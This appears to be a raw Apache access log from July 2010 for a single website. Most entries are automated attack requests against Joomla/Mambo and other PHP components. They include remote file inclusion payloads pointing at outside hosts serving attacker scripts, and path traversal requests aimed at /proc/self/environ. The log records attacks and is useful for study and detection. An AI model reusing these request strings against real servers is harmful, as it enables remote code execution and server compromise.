94.102.9.224 - - [02/Jul/2010:02:25:07 -0700] "GET /logs/access_091105.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
94.102.9.224 - - [02/Jul/2010:02:25:07 -0700] "GET /logs/access_091126.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
213.180.89.92 - - [02/Jul/2010:02:25:26 -0700] "GET /logs/access_100121.log//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:15 -0700] "GET /logs/access_100107.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:05 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:15 -0700] "GET /logs/access_091217.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:05 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:05 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:05 -0700] "GET /logs/access_100107.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:05 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
92.60.176.46 - - [02/Jul/2010:02:33:06 -0700] "GET /logs/access_091217.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:02:37:38 -0700] "GET /logs//index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:02:37:28 -0700] "GET /index.php?option=com_mgm&&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:02:39:56 -0700] "GET /logs//index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:02:40:07 -0700] "GET /index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:03:10:51 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:03:11:02 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
220.181.94.231 - - [02/Jul/2010:03:14:17 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.elfagr.net"
220.181.94.231 - - [02/Jul/2010:03:14:38 -0700] "GET / HTTP/1.1" 200 1465 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.elfagr.net"
67.218.116.169 - - [02/Jul/2010:03:16:49 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
216.18.213.162 - - [02/Jul/2010:03:18:28 -0700] "GET /logs/access_100624.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.elfagr.net"
110.138.164.162 - - [02/Jul/2010:03:26:51 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
110.138.164.162 - - [02/Jul/2010:03:26:42 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
110.138.164.162 - - [02/Jul/2010:03:26:55 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
110.138.164.162 - - [02/Jul/2010:03:27:49 -0700] "GET /logs/access_100701.log HTTP/1.1" 200 1961129 "http://www.elfagr.net/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
75.126.2.74 - - [02/Jul/2010:03:39:02 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:03:39:24 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:03:45:52 -0700] "GET /logs/access_091217.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:03:46:03 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:03:45:53 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:03:45:59 -0700] "GET /logs/access_091203.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
75.126.2.74 - - [02/Jul/2010:03:46:11 -0700] "GET /logs/access_091217.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
75.126.2.74 - - [02/Jul/2010:03:46:21 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
75.126.2.74 - - [02/Jul/2010:03:46:21 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
75.126.2.74 - - [02/Jul/2010:03:46:28 -0700] "GET /logs/access_091203.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
75.42.193.142 - - [02/Jul/2010:04:00:52 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
75.42.193.142 - - [02/Jul/2010:04:00:52 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.190.166.35 - - [02/Jul/2010:04:05:04 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [02/Jul/2010:04:04:54 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:04:07:24 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:04:07:14 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:04:07:26 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:04:07:16 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:04:07:16 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:04:07:16 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:04:07:17 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:04:07:34 -0700] "GET /logs//components/errors.php?error=http://mountaincabinforrent.com/images/stories/fruit/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:04:07:45 -0700] "GET /components/errors.php?error=http://mountaincabinforrent.com/images/stories/fruit/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:04:10:55 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:25 -0700] "GET /logs/access_100204.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:25 -0700] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:25 -0700] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:26 -0700] "GET /logs/access_100211.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:38 -0700] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:38 -0700] "GET /logs/access_100204.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:38 -0700] "GET /logs/access_100211.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:19:38 -0700] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:20:43 -0700] "GET /logs/access_100204.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:20:53 -0700] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:20:43 -0700] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:20:43 -0700] "GET /logs/access_100211.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
208.97.167.14 - - [02/Jul/2010:04:21:22 -0700] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
208.97.167.14 - - [02/Jul/2010:04:21:22 -0700] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
220.181.7.126 - - [02/Jul/2010:04:25:25 -0700] "GET / HTTP/1.1" 200 1465 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:04:26:46 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:04:26:46 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:04:28:05 -0700] "GET /logs/access_091203.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:04:31:15 -0700] "GET /logs/access_100121.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:04:31:26 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.143.220.3 - - [02/Jul/2010:04:31:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:37 -0700] "GET /logs/access_091015.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:37 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:37 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:39 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:39 -0700] "GET /logs/access_091015.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:49 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:46 -0700] "GET /logs/access_091119.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:57 -0700] "GET /logs/access_091015.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:47 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:47 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:48 -0700] "GET /logs/access_091119.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:04:31:55 -0700] "GET /logs/access_091119.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:34:45 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:34:55 -0700] "GET /logs/access_091029.log//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:34:45 -0700] "GET /Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:35:01 -0700] "GET /logs/access_091217.log//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:38:23 -0700] "GET /Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:38:23 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:38:13 -0700] "GET /logs/access_091029.log//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:38:28 -0700] "GET /logs/access_091217.log//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:50:11 -0700] "GET /logs/access_091029.log%20%20//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:50:21 -0700] "GET /logs/access_091217.log%20%20//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:50:25 -0700] "GET /logs/access_091029.log%20%20//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:04:50:32 -0700] "GET /logs/access_091217.log%20%20//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:23 -0700] "GET /logs/access_091105.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:33 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:23 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:26 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:27 -0700] "GET /logs/access_091105.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:28 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:40 -0700] "GET /logs/access_091112.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [02/Jul/2010:05:01:36 -0700] "GET /logs/access_091112.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:03:17 -0700] "GET /logs/access.log//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:03:28 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:03:19 -0700] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
110.138.164.162 - - [02/Jul/2010:05:08:12 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
110.138.164.162 - - [02/Jul/2010:05:10:10 -0700] "GET /logs/access_100624.log HTTP/1.1" 200 3168634 "http://www.elfagr.net/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:11:22 -0700] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:11:12 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.130.228.64 - - [02/Jul/2010:05:11:29 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; Hotbar 11.0.78.0)" "www.elfagr.net"
67.218.116.164 - - [02/Jul/2010:05:20:53 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:22:22 -0700] "GET /logs/access_100114.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:22:22 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:22:23 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.251.80.167 - - [02/Jul/2010:05:22:39 -0700] "GET /logs/access.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:29:07 -0700] "GET /logs//index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:29:08 -0700] "GET /index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.191.136.210 - - [02/Jul/2010:05:30:38 -0700] "GET /components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.elfagr.net"
